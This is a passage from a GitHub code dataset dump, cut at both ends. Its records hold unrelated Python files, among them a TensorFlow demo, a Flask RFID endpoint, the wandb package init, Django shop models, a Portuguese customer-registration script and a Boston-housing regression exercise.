np\n\"\"\"\nTensorFlow tensor example\n\"\"\"\ngraph=tf.Graph()\nsession=tf.InteractiveSession(graph=graph)\n\nx=tf.placeholder(dtype=tf.float32,shape=[1,10],name='x')\nW=tf.Variable(tf.random_uniform(shape=[10,5],minval=-0.1,maxval=0.1,dtype=tf.float32),name='w')\nb=tf.Variable(tf.zeros(shape=[5],dtype=tf.float32),name='b')\n\nh=tf.nn.sigmoid(tf.matmul(x,W)+b)\n\ntf.global_variables_initializer().run()\nsession.run(h,feed_dict={x:np.random.rand(1,10)})\nsession.close()\n\n\n\n","repo_name":"FreeFlyXiaoMa/RNNLSTM","sub_path":"tensorflow_demo/demo14.py","file_name":"demo14.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43044920990","text":"from flask_restx import Resource\n\nfrom globals import get_connection\n\n\n# EditPilot.vue\n# GET /rfid\nclass RfidAvailable(Resource):\n    def get(self):\n        '''available RFID tags'''\n        connection = get_connection(\"database_server.db\")\n        cursor = connection.cursor()\n\n        return_dict = {\n            'rfid_list': []\n        }\n        for row in cursor.execute(\n                'SELECT RFID_Code FROM RFID_Ausweis WHERE RFID_Code NOT IN (SELECT RFID_Code FROM Pilot WHERE RFID_Code NOT NULL)'):\n            rfid_tag = hex(row[0])\n            return_dict['rfid_list'].append(rfid_tag)\n        connection.close()\n        return return_dict\n","repo_name":"christiandettlaff/E2-Anwesenheitserfassung-fuer-Modellflugplatz","sub_path":"src/webserver/backend/rfid_available.py","file_name":"rfid_available.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"18957310517","text":"class Solution(object):\n    def minAbsoluteSumDiff(self, nums1, nums2):\n        \"\"\"\n        :type nums1: List[int]\n        :type nums2: List[int]\n        :rtype: int\n        \"\"\"\n        length = len(nums1)\n        i = 0\n        max_dis, index1 = 0, -1\n        result_map = {}\n        while i < length:\n            res = abs(nums1[i] - nums2[i])\n            if res > max_dis:\n                max_dis = res\n                index1 = i\n            result_map[i] = res\n            i += 1\n        i, temp = 0, 1000000000\n        index2 = -1\n        while i < length:\n            if i != index1:\n                if abs(nums1[i] - nums2[index1]) < temp:\n                    temp = abs(nums1[i] - nums2[index1])\n                    index2 = i\n            i += 1\n        result_map[index1] = temp\n        nums1[index1] = nums1[index2]\n        print(nums1)\n        print(nums2)\n        print(sum(result_map.values()))\n        # integer modulus keeps the result an int (math.pow would return a float)\n        return sum(result_map.values()) % (10 ** 9 + 7)\n\n\n# Solution().minAbsoluteSumDiff([1, 7, 5], [2, 3, 5])\n# Solution().minAbsoluteSumDiff([2, 4, 6, 8, 10], [2, 4, 6, 8, 10])\n# Solution().minAbsoluteSumDiff([1, 10, 4, 4, 2, 7], [9, 3, 5, 1, 7, 4])\nSolution().minAbsoluteSumDiff([1, 28, 21], [9, 21, 20])\n","repo_name":"bobowang2017/python_study","sub_path":"algorithm/leetcode/1/1818. 
绝对差值和.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395816471","text":"\"\"\"Use wandb to track machine learning work.\n\nThe most commonly used functions/objects are:\n - wandb.init — initialize a new run at the top of your training script\n - wandb.config — track hyperparameters and metadata\n - wandb.log — log metrics and media over time within your training loop\n\nFor guides and examples, see https://docs.wandb.ai.\n\nFor scripts and interactive notebooks, see https://github.com/wandb/examples.\n\nFor reference documentation, see https://docs.wandb.com/ref/python.\n\"\"\"\n__version__ = \"0.15.13.dev1\"\n_minimum_nexus_version = \"0.16.0b3\"\n\n# Used with pypi checks and other messages related to pip\n_wandb_module = \"wandb\"\n\nfrom typing import Optional\n\nfrom wandb.errors import Error\n\n# This needs to be early as other modules call it.\nfrom wandb.errors.term import termsetup, termlog, termerror, termwarn\n\nfrom wandb import sdk as wandb_sdk\n\nimport wandb\n\nwandb.wandb_lib = wandb_sdk.lib\n\ninit = wandb_sdk.init\nsetup = wandb_sdk.setup\n_attach = wandb_sdk._attach\n_teardown = wandb_sdk.teardown\nwatch = wandb_sdk.watch\nunwatch = wandb_sdk.unwatch\nfinish = wandb_sdk.finish\njoin = finish\nlogin = wandb_sdk.login\nhelper = wandb_sdk.helper\nsweep = wandb_sdk.sweep\ncontroller = wandb_sdk.controller\nrequire = wandb_sdk.require\nArtifact = wandb_sdk.Artifact\nAlertLevel = wandb_sdk.AlertLevel\nSettings = wandb_sdk.Settings\nConfig = wandb_sdk.Config\n\nfrom wandb.apis import InternalApi, PublicApi\nfrom wandb.errors import CommError, UsageError\n\n_preinit = wandb.wandb_lib.preinit\n_lazyloader = wandb.wandb_lib.lazyloader\n\n# Call import module hook to set up any needed require hooks\nwandb.sdk.wandb_require._import_module_hook()\n\nfrom wandb import wandb_torch\n\n# Move this (keras.__init__ expects it at top level)\nfrom wandb.data_types import Graph\nfrom wandb.data_types import Image\nfrom wandb.data_types import Plotly\n\n# from wandb.data_types import Bokeh # keeping out of top level for now since Bokeh plots have poor UI\nfrom wandb.data_types import Video\nfrom wandb.data_types import Audio\nfrom wandb.data_types import Table\nfrom wandb.data_types import Html\nfrom wandb.data_types import Object3D\nfrom wandb.data_types import Molecule\nfrom wandb.data_types import Histogram\nfrom wandb.data_types import Classes\nfrom wandb.data_types import JoinedTable\n\nfrom wandb.wandb_agent import agent\n\n# from wandb.core import *\nfrom wandb.viz import visualize\nfrom wandb import plot\nfrom wandb import plots # deprecating this\nfrom wandb.integration.sagemaker import sagemaker_auth\nfrom wandb.sdk.internal import profiler\n\n# Artifact import types\nfrom wandb.sdk.artifacts.artifact_ttl import ArtifactTTL\n\n# Used to make sure we don't use some code in the incorrect process context\n_IS_INTERNAL_PROCESS = False\n\n\ndef _set_internal_process(disable=False):\n global _IS_INTERNAL_PROCESS\n if _IS_INTERNAL_PROCESS is None:\n return\n if disable:\n _IS_INTERNAL_PROCESS = None\n return\n _IS_INTERNAL_PROCESS = True\n\n\ndef _assert_is_internal_process():\n if _IS_INTERNAL_PROCESS is None:\n return\n assert _IS_INTERNAL_PROCESS\n\n\ndef _assert_is_user_process():\n if _IS_INTERNAL_PROCESS is None:\n return\n assert not _IS_INTERNAL_PROCESS\n\n\n# toplevel:\n# save()\n# restore()\n# login()\n# sweep()\n# agent()\n\n# globals\nApi = PublicApi\napi = 
InternalApi()\nrun: Optional[\"wandb_sdk.wandb_run.Run\"] = None\nconfig = _preinit.PreInitObject(\"wandb.config\", wandb_sdk.wandb_config.Config)\nsummary = _preinit.PreInitObject(\"wandb.summary\", wandb_sdk.wandb_summary.Summary)\nlog = _preinit.PreInitCallable(\"wandb.log\", wandb_sdk.wandb_run.Run.log)\nsave = _preinit.PreInitCallable(\"wandb.save\", wandb_sdk.wandb_run.Run.save)\nrestore = wandb_sdk.wandb_run.restore\nuse_artifact = _preinit.PreInitCallable(\n \"wandb.use_artifact\", wandb_sdk.wandb_run.Run.use_artifact\n)\nlog_artifact = _preinit.PreInitCallable(\n \"wandb.log_artifact\", wandb_sdk.wandb_run.Run.log_artifact\n)\nlog_model = _preinit.PreInitCallable(\n \"wandb.log_model\", wandb_sdk.wandb_run.Run.log_model\n)\nuse_model = _preinit.PreInitCallable(\n \"wandb.use_model\", wandb_sdk.wandb_run.Run.use_model\n)\nlink_model = _preinit.PreInitCallable(\n \"wandb.link_model\", wandb_sdk.wandb_run.Run.link_model\n)\ndefine_metric = _preinit.PreInitCallable(\n \"wandb.define_metric\", wandb_sdk.wandb_run.Run.define_metric\n)\n\nmark_preempting = _preinit.PreInitCallable(\n \"wandb.mark_preempting\", wandb_sdk.wandb_run.Run.mark_preempting\n)\n\nplot_table = _preinit.PreInitCallable(\n \"wandb.plot_table\", wandb_sdk.wandb_run.Run.plot_table\n)\nalert = _preinit.PreInitCallable(\"wandb.alert\", wandb_sdk.wandb_run.Run.alert)\n\n# record of patched libraries\npatched = {\"tensorboard\": [], \"keras\": [], \"gym\": []}\n\nkeras = _lazyloader.LazyLoader(\"wandb.keras\", globals(), \"wandb.integration.keras\")\nsklearn = _lazyloader.LazyLoader(\"wandb.sklearn\", globals(), \"wandb.sklearn\")\ntensorflow = _lazyloader.LazyLoader(\n \"wandb.tensorflow\", globals(), \"wandb.integration.tensorflow\"\n)\nxgboost = _lazyloader.LazyLoader(\n \"wandb.xgboost\", globals(), \"wandb.integration.xgboost\"\n)\ncatboost = _lazyloader.LazyLoader(\n \"wandb.catboost\", globals(), \"wandb.integration.catboost\"\n)\ntensorboard = _lazyloader.LazyLoader(\n \"wandb.tensorboard\", globals(), \"wandb.integration.tensorboard\"\n)\ngym = _lazyloader.LazyLoader(\"wandb.gym\", globals(), \"wandb.integration.gym\")\nlightgbm = _lazyloader.LazyLoader(\n \"wandb.lightgbm\", globals(), \"wandb.integration.lightgbm\"\n)\ndocker = _lazyloader.LazyLoader(\"wandb.docker\", globals(), \"wandb.docker\")\njupyter = _lazyloader.LazyLoader(\"wandb.jupyter\", globals(), \"wandb.jupyter\")\nsacred = _lazyloader.LazyLoader(\"wandb.sacred\", globals(), \"wandb.integration.sacred\")\n\n\ndef ensure_configured():\n global api\n api = InternalApi()\n\n\ndef set_trace():\n import pdb # TODO: support other debuggers\n\n # frame = sys._getframe().f_back\n pdb.set_trace() # TODO: pass the parent stack...\n\n\ndef load_ipython_extension(ipython):\n ipython.register_magics(wandb.jupyter.WandBMagics)\n\n\nif wandb_sdk.lib.ipython.in_notebook():\n from IPython import get_ipython\n\n load_ipython_extension(get_ipython())\n\n\nfrom .analytics import Sentry as _Sentry\n\n_sentry = _Sentry()\n_sentry.setup()\n\n\n# print a warning if running py 3.6 saying that it will be deprecated in the 0.16.0 release\ntry:\n import sys\n\n if sys.version_info[0] == 3 and sys.version_info[1] == 6:\n termwarn(\n \"Support for Python 3.6 will be discontinued \"\n \"in the upcoming 0.16.0 release of wandb. 
\"\n \"We recommend upgrading to Python 3.7 or a later version.\",\n repeat=False,\n )\nexcept Exception:\n pass\n\n\n__all__ = (\n \"__version__\",\n \"init\",\n \"setup\",\n \"save\",\n \"sweep\",\n \"controller\",\n \"agent\",\n \"config\",\n \"log\",\n \"summary\",\n \"join\",\n \"Api\",\n \"Graph\",\n \"Image\",\n \"Plotly\",\n \"Video\",\n \"Audio\",\n \"Table\",\n \"Html\",\n \"Object3D\",\n \"Molecule\",\n \"Histogram\",\n \"ArtifactTTL\",\n \"log_model\",\n \"use_model\",\n \"link_model\",\n)\n","repo_name":"wandb/wandb","sub_path":"wandb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"14648046276","text":"def addsq(x):\n '''\n Compute the square of an integer by adding abs(value) that many times.\n \n >>> addsq(4)\n 16\n >>> addsq(-2)\n 4\n >>> addsq(0)\n 0\n '''\n n = abs(x)\n sq = 0\n for i in range(n):\n sq += n\n return sq\n","repo_name":"heitorchang/reading-list","sub_path":"python-fluente/doctests/addsq.py","file_name":"addsq.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29179676287","text":"import email\nfrom itertools import product\nfrom random import choices\nfrom tabnanny import verbose\nfrom django.db import models\nimport datetime\nimport os\nfrom django.contrib.auth.models import User\nfrom PIL import Image\n\n\n\n# Create your models here.\n\ndef get_file_path(request,filename):\n orginal_filename = filename\n nowTime = datetime.datetime.now().strftime('%Y%m%d%H:%M:%S')\n filename = \"%s%s\" % (nowTime,orginal_filename)\n return os.path.join('uploads/',filename)\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=150,null=False,blank=False)\n image = models.ImageField(upload_to=get_file_path,null =True,blank=False)\n description = models.TextField(max_length=500,null=False,blank=False)\n status = models.BooleanField(default=False, verbose_name=(\"0=default 1=Hidden\"))\n trending = models.BooleanField(default=False, verbose_name=(\"0=default 1=Trending\"))\n meta_title = models.CharField(max_length=150,blank=False)\n meta_keywords = models.CharField(max_length=150,blank=False)\n meta_description = models.TextField(max_length=150,null=False,blank=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \n def __str__(self):\n return self.name\n \n \nclass Product(models.Model):\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n name = models.CharField(max_length=150,null=False,blank=False)\n image = models.ImageField(upload_to=get_file_path,null =True,blank=False)\n image2 = models.ImageField(upload_to=get_file_path,null =False,blank=True)\n image3= models.ImageField(upload_to=get_file_path,null =False,blank=True)\n image4 = models.ImageField(upload_to=get_file_path,null =False,blank=True)\n image5 = models.ImageField(upload_to=get_file_path,null =False,blank=True)\n small_description = models.CharField(max_length=250,null=False,blank=False)\n SIZE_CHOICES = {\n (\"S\",'S'),\n (\"M\",'M'),\n (\"L\",'L'),\n (\"XL\",'XL'),\n (\"XLL\",'XLL'),\n (\"XLLL\",'XLLL'),\n \n }\n size = models.CharField(max_length=50,choices=SIZE_CHOICES,default='M')\n quantity = models.IntegerField(null=False,blank=False,default=25)\n description = models.TextField(max_length=500,null=False,blank=False)\n orginal_price = models.FloatField(null=False,blank=False)\n selling_price = 
models.FloatField(null=False,blank=False)\n status = models.BooleanField(default=False, verbose_name=(\"0=default 1=Hidden\"))\n trending = models.BooleanField(default=False, verbose_name=(\"0=default 1=Trending\"))\n tag = models.CharField(max_length=150,null=False,blank=False)\n meta_title = models.CharField(max_length=150,blank=False)\n meta_keywords = models.CharField(max_length=150,blank=False)\n meta_description = models.TextField(max_length=150,null=False,blank=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \n \n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n\n img1 = Image.open(self.image.path)\n if img1.height > 1500 or img1.width > 1500:\n output_size = (1500, 1500)\n img1.thumbnail(output_size)\n img1.save(self.image.path)\n\n if self.image2:\n img2 = Image.open(self.image2.path)\n if img2.height > 1500 or img2.width > 1500:\n output_size = (1500, 1500)\n img2.thumbnail(output_size)\n img2.save(self.image2.path)\n\n if self.image3:\n img3 = Image.open(self.image3.path)\n if img3.height > 1500 or img3.width > 1500:\n output_size = (1500, 1500)\n img3.thumbnail(output_size)\n img3.save(self.image3.path)\n\n if self.image4:\n img4 = Image.open(self.image4.path)\n if img4.height > 1500 or img4.width > 1500:\n output_size = (1500, 1500)\n img4.thumbnail(output_size)\n img4.save(self.image4.path)\n\n if self.image5:\n img5 = Image.open(self.image5.path)\n if img5.height > 1500 or img5.width > 1500:\n output_size = (1500, 1500)\n img5.thumbnail(output_size)\n img5.save(self.image5.path)\n\n \n def __str__(self):\n return self.name\n\n\n\nclass ProductReview(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n review = models.TextField()\n time = models.DateTimeField(auto_now=True)\n \nclass Cart(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n SIZE_CHOICES = {\n (\"S\",'S'),\n (\"M\",'M'),\n (\"L\",'L'),\n (\"XL\",'XL'),\n (\"XLL\",'XLL'),\n (\"XLLL\",'XLLL'),\n \n }\n size = models.CharField(max_length=50,choices=SIZE_CHOICES,default='M')\n product_qty = models.IntegerField(null=False, blank=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \nclass Wishlist(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now_add=True)\n \nclass Order(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n fname = models.CharField(max_length=150, null=False)\n lname = models.CharField(max_length=150, null=False)\n email = models.EmailField(max_length=150, null=False)\n phone = models.CharField(max_length=150, null=False)\n address = models.TextField( null=False)\n district = models.CharField(max_length=150,null=False)\n STATE_CHOICES = (\n\t\t(\"Andaman & Nicobar Islands\",'Andaman & Nicobar Islands'),\n\t\t(\"Andhra Pradesh\",'Andhra Pradesh'),\n\t\t(\"Arunachal Pradesh\",'Arunachal Pradesh'),\n\t\t(\"Assam\",'Assam'),\n\t\t(\"Bihar\",'Bihar'),\n\t\t(\"Chandigarh\",'Chandigarh'),\n\t\t(\"Chhattisgarh\",'Chhattisgarh'),\n\t\t(\"Dadra & Nagar Haveli\",'Dadra & Nagar Haveli'),\n\t\t(\"Daman and Diu\",'Daman and Diu'),\n\t\t(\"Delhi\",'Delhi'),\n\t\t(\"Goa\",'Goa'),\n\t\t(\"Gujarat\",'Gujarat'),\n\t\t(\"Haryana\",'Haryana'),\n\t\t(\"Himachal Pradesh\",'Himachal Pradesh'),\n\t\t(\"Jammu & Kashmir\",'Jammu & 
Kashmir'),\n\t\t(\"Jharkhand\",'Jharkhand'),\n\t\t(\"Karnataka\",'Karnataka'),\n\t\t(\"Kerala\",'Kerala'),\n\t\t(\"Lakshadweep\",'Lakshadweep'),\n\t\t(\"Madhya Pradesh\",'Madhya Pradesh'),\n\t\t(\"Maharashtra\",'Maharashtra'),\n\t\t(\"Manipur\",'Manipur'),\n\t\t(\"Meghalaya\",'Meghalaya'),\n\t\t(\"Mizoram\",'Mizoram'),\n\t\t(\"Nagaland\",'Nagaland'),\n\t\t(\"Odisha\",'Odisha'),\n\t\t(\"Puducherry\",'Puducherry'),\n\t\t(\"Punjab\",'Punjab'),\n\t\t(\"Rajasthan\",'Rajasthan'),\n\t\t(\"Sikkim\",'Sikkim'),\n\t\t(\"Tamil Nadu\",'Tamil Nadu'),\n\t\t(\"Telangana\",'Telangana'),\n\t\t(\"Tripura\",'Tripura'),\n\t\t(\"Uttarakhand\",'Uttarakhand'),\n\t\t(\"Uttar Pradesh\",'Uttar Pradesh'),\n\t\t(\"West Bengal\",'West Bengal'),\n\t\t)\n\t\n state = models.CharField(max_length=50,choices=STATE_CHOICES, null=True)\n country = models.CharField(max_length=150, null=False)\n pincode = models.CharField(max_length=150, null=False)\n total_price = models.FloatField(null=False)\n payment_mode = models.CharField(max_length=150, null=False)\n payment_id = models.CharField(max_length=250, null=True)\n orderstatuses = {\n ('Pending','Pending'),\n ('Out for Shipping','Out for Shipping'),\n ('Completed','Completed'),\n }\n status = models.CharField(max_length=150, choices=orderstatuses, default='Pending')\n message = models.TextField(null=True)\n tracking_id = models.CharField(max_length=150, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n \n def __str__(self):\n return ' {} - {}'.format(self.id,self.tracking_id)\n \nclass OrderItem(models.Model):\n order = models.ForeignKey(Order, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n SIZE_CHOICES = {\n (\"S\",'S'),\n (\"M\",'M'),\n (\"L\",'L'),\n (\"XL\",'XL'),\n (\"XLL\",'XLL'),\n (\"XLLL\",'XLLL'),\n \n }\n size = models.CharField(max_length=50,choices=SIZE_CHOICES,default='M')\n price = models.FloatField(null=False)\n quantity = models.IntegerField(null=False)\n \n def __str__(self):\n return ' {} - {}'.format(self.order.id,self.order.tracking_id)\n \n \nclass Profile(models.Model):\n def image_upload_to(self, instance=None):\n if instance:\n return os.path.join(\"store\", self.user, instance)\n return None\n\n\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n #image = models.ImageField(default='images/users.png', upload_to=image_upload_to)\n image = models.ImageField(default='static/images/users.png', upload_to='static/users',blank=True,null=True)\n\n phone = models.CharField(max_length=150, null=False)\n address = models.TextField( null=False)\n district = models.CharField(max_length=150,null=False)\n STATE_CHOICES = (\n\t\t(\"Andaman & Nicobar Islands\",'Andaman & Nicobar Islands'),\n\t\t(\"Andhra Pradesh\",'Andhra Pradesh'),\n\t\t(\"Arunachal Pradesh\",'Arunachal Pradesh'),\n\t\t(\"Assam\",'Assam'),\n\t\t(\"Bihar\",'Bihar'),\n\t\t(\"Chandigarh\",'Chandigarh'),\n\t\t(\"Chhattisgarh\",'Chhattisgarh'),\n\t\t(\"Dadra & Nagar Haveli\",'Dadra & Nagar Haveli'),\n\t\t(\"Daman and Diu\",'Daman and Diu'),\n\t\t(\"Delhi\",'Delhi'),\n\t\t(\"Goa\",'Goa'),\n\t\t(\"Gujarat\",'Gujarat'),\n\t\t(\"Haryana\",'Haryana'),\n\t\t(\"Himachal Pradesh\",'Himachal Pradesh'),\n\t\t(\"Jammu & Kashmir\",'Jammu & Kashmir'),\n\t\t(\"Jharkhand\",'Jharkhand'),\n\t\t(\"Karnataka\",'Karnataka'),\n\t\t(\"Kerala\",'Kerala'),\n\t\t(\"Lakshadweep\",'Lakshadweep'),\n\t\t(\"Madhya Pradesh\",'Madhya 
Pradesh'),\n\t\t(\"Maharashtra\",'Maharashtra'),\n\t\t(\"Manipur\",'Manipur'),\n\t\t(\"Meghalaya\",'Meghalaya'),\n\t\t(\"Mizoram\",'Mizoram'),\n\t\t(\"Nagaland\",'Nagaland'),\n\t\t(\"Odisha\",'Odisha'),\n\t\t(\"Puducherry\",'Puducherry'),\n\t\t(\"Punjab\",'Punjab'),\n\t\t(\"Rajasthan\",'Rajasthan'),\n\t\t(\"Sikkim\",'Sikkim'),\n\t\t(\"Tamil Nadu\",'Tamil Nadu'),\n\t\t(\"Telangana\",'Telangana'),\n\t\t(\"Tripura\",'Tripura'),\n\t\t(\"Uttarakhand\",'Uttarakhand'),\n\t\t(\"Uttar Pradesh\",'Uttar Pradesh'),\n\t\t(\"West Bengal\",'West Bengal'),\n\t\t)\n\t\n state = models.CharField(max_length=50,choices=STATE_CHOICES, null=True)\n country = models.CharField(max_length=150, null=False)\n pincode = models.CharField(max_length=150, null=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \n def __str__(self):\n return self.user.username\n \n \n","repo_name":"amalmathew21/Adam","sub_path":"Adam/store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23762180443","text":"\"\"\"\nEntra21 Blusoft 2020 - Formação em Python\n\nAutores: Marcus Moresco Boeno e Maria Vitória Machado\nData: 2020-10-09\n\nCadastro básico de clientes e endereços utilizando:\n - Listas\n - Dicionários\n - Funções\n\"\"\"\n\n# Importando funcoes\nfrom funcoes_pessoa import cadastrar_pessoa, pessoas_cadastradas, cadastro_cliente \nfrom funcoes_endereco import cadastrar_endereco, enderecos_cadastrados, endereco_cliente\n\n# Apresenta cabecalho do sistema\nprint(\"\\n\" + \"*\"*90)\nprint(f\"{'Bem Vindo ao Cadastro de Clientes 1.0!':^90}\")\nprint(\"*\"*90)\n\nwhile True:\n\n # Apresenta quantidade de clientes cadastrados\n print(f\"\\n> {len(pessoas_cadastradas())} clientes cadastrados\")\n \n # Capta input do usuario quanto a terminar a execucao ou continuar\n while True:\n res = input(\"Deseja cadastrar novo cliente?! 
([s]/n) \").strip().lower()\n if res in \"sn\":\n break\n \n # Cadastro de novo cliente\n if res in \"s\":\n print(\"\\n>>> Cadastrando novo cliente:\\n\")\n\n # Coletando dados pessoas\n print(\"--- Dados pessoais:\")\n nome = input(\"Nome: \").strip()\n sobrenome = input(\"Sobrenome: \").strip()\n idade = int(input(\"Idade: \").strip())\n\n # Realizando cadastro\n res_cad = cadastrar_pessoa(nome, sobrenome, idade)\n\n # Checa se cadastro foi realizado com sucesso\n if type(res_cad) is str:\n print(\"\\n\" + res_cad + \"\\n\")\n print(\"-\"*90 + \"\\n\")\n else:\n while True:\n # Se cadastro realizado com sucesso, registrar endereco\n print(\"\\n--- Endereço:\")\n rua = input(\"Rua: \").strip()\n numero = input(\"Número: \").strip()\n complemento = input(\"Complemento: \").strip()\n bairro = input(\"Bairro: \").strip()\n cidade = input(\"Cidade: \").strip()\n estado = input(\"Estado: \").strip()\n\n # Realizando cadastro de endereco\n res_endereco = cadastrar_endereco(\n res_cad, rua, numero, complemento, bairro, cidade, estado\n )\n \n # Apresenta mensagem se cadastro foi concluído ou não\n if res_endereco[0] == 0:\n print(\"\\n\" + res_endereco[1] + \"\\n\")\n print(\"Refazendo cadastro de endereço ...\")\n else:\n print(\"\\n\" + res_endereco[1] + \"\\n\")\n print(\"-\"*90 + \"\\n\")\n break\n \n # Apresentacao dos clientes em tela e termino da execucao\n else:\n print(\"\\n>>> Apresentando Cadastros:\")\n\n # Apresenta cabecalho\n print(\"\\n\" + \"*\"*90)\n print(f\"{'CLIENTES CADASTRADOS':^90}\")\n print(\"*\"*90 + \"\\n\")\n \n # Recupera lista de clientes\n clientes = pessoas_cadastradas()\n\n # Itera sobre clientes\n for cliente in clientes:\n id_cliente = cliente['id']\n endereco = endereco_cliente(id_cliente)\n print(f\"> Cliente #{id_cliente}\")\n print(f\" Nome: {cliente['nome']} {cliente['sobrenome']}\")\n print(f\" Idade: {cliente['idade']} anos\")\n print(\n \" Endereço: {}, {}, {}, {}, {}-{}\\n\".format(\n endereco['rua'],\n endereco['numero'],\n endereco['complemento'],\n endereco['bairro'],\n endereco['cidade'],\n endereco['estado'],\n )\n )\n \n # Apresenta rodape\n print(\"*\"*90 + \"\\n\")\n\n # Apresenta mensagem de fim de execução\n print(\"Saindo do sistema, até logo...\\n\")\n break\n","repo_name":"boenomarcus/entra21_py","sub_path":"aulas_maykon/aula_008_def_dict/main_cadastro.py","file_name":"main_cadastro.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35947718983","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nimport sklearn.linear_model as skl_lm\r\n\r\nbd = datasets.load_boston()\r\nnames = bd['feature_names']\r\nbd.columns = names\r\nX = pd.DataFrame(bd.data)\r\nX.columns = names\r\ny = pd.DataFrame(bd.target)\r\ny.columns = np.array([\"MEDV\"])\r\nX.head()\r\ny.head()\r\nRM = X['RM']\r\n\r\n#Prudcuce plot of 'MEDV' vs 'RM'\r\nax = plt.gca()\r\nax.scatter(RM, y)\r\nplt.xlabel('RM')\r\nplt.ylabel('MDEV')\r\n\r\ndf = pd.DataFrame(RM)\r\ndf['MDEV'] = y\r\n0.8 * len(df)\r\ntrain_df = df.sample(405, random_state=1)\r\ntest_df = df[~df.isin(train_df)].dropna(how = 'all')\r\n\r\nX_train = train_df['RM'].values.reshape(-1,1)\r\ny_train = train_df['MDEV']\r\nX_test = test_df['RM'].values.reshape(-1,1)\r\ny_test = test_df['MDEV']\r\n\r\nlm = skl_lm.LinearRegression()\r\nmodel = lm.fit(X_train, y_train)\r\npred = model.predict(X_test)\r\n\r\nfrom sklearn.metrics import 
mean_squared_error\r\n\r\nMSE = mean_squared_error(y_test, pred)\r\n\r\nprint(\"Linear Regression MSE: \", MSE)\r\n\r\n#Kfold cv\r\n\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\n\r\ncv_k = KFold(n_splits = 10, random_state = 1, shuffle=True)\r\n\r\nscores_k = cross_val_score(model, X, y, scoring=\"neg_mean_squared_error\", cv = cv_k, n_jobs=1)\r\n\r\nprint(\"Using KFold: Folds: \" + str(len(scores_k)) +\", MSE: \" + str(np.mean(np.abs(scores_k))) + \", STD: \" + str(np.std(scores_k)))\r\n\r\nprint(\"Cross-validated scores:\", np.abs(scores_k))\r\n\r\nfrom sklearn.model_selection import cross_val_predict\r\npredictions = cross_val_predict(model, X, y, cv=cv_k, n_jobs=1)\r\n#plt.scatter(y,predictions)\r\n\r\n#LOOCV\r\n\r\nmodel = lm.fit(X_train, y_train)\r\nfrom sklearn.model_selection import LeaveOneOut\r\nloo = LeaveOneOut()\r\nX = df['RM'].values.reshape(-1,1)\r\ny = df['MDEV'].values.reshape(-1,1)\r\nloo.get_n_splits(X)\r\n\r\ncv_loo = KFold(n_splits = len(X), random_state=None, shuffle=True)\r\n\r\nscores_loo = cross_val_score(model, X, y, scoring=\"neg_mean_squared_error\", cv=cv_loo, n_jobs=1)\r\n\r\nprint(\"Using LOOCV Folds: \" + str(len(scores_loo)), \", MSE: \" + str(np.mean(np.abs(scores_loo))) + \", STD: \" +str(np.std(scores_loo)))\r\n\r\n\r\ndef bt(df, B):\r\n sample_R=[]\r\n data = []\r\n for i in range(B):\r\n for j in range(10):\r\n x = np.random.choice(503, 1)\r\n n = df.iloc[x,:]\r\n data.append(dict(n))\r\n y = pd.DataFrame(data)\r\n z = y.astype(float)\r\n corr = z.corr(method='pearson')\r\n corr1 = corr.iloc[0,1]\r\n sample_R.append(corr1)\r\n data=[]\r\n return(sample_R)\r\n \r\n\r\n\r\ntest = bt(df,50)\r\ngraph = pd.DataFrame(test)\r\ngraph.plot.hist(grid = True,bins = 10, rwidth=1)\r\nplt.title('Distrubution of R')\r\nplt.xlabel('Sample')\r\nplt.ylabel('R')\r\nplt.grid(axis='y', alpha=0.75)\r\n\r\nprint(\"Median estimate: \", np.median(test))\r\nprint(\"Average estimate: \", np.mean(test))\r\nprint(\"Standard Error estimate: \", np.std(test))\r\n\r\nbasic = np.quantile(test,(0.025,0.975))\r\nprint(\"95% confidence interval: \", basic)\r\n\r\ndef bt_beta(df,B):\r\n data = []\r\n sample_beta = []\r\n sample_intercept = []\r\n lm = skl_lm.LinearRegression()\r\n for i in range(B):\r\n for j in range(10):\r\n x = np.random.choice(503, 1)\r\n n = df.iloc[x,:]\r\n data.append(dict(n))\r\n names = ['RM', 'MDEV']\r\n frame = pd.DataFrame(data = data, columns = names)\r\n flo = frame.astype(float)\r\n X = np.array(flo['RM']).reshape(-1,1)\r\n y = np.array(flo['MDEV']).reshape(-1,1)\r\n n = lm.fit(X,y)\r\n c = n.coef_\r\n inter = 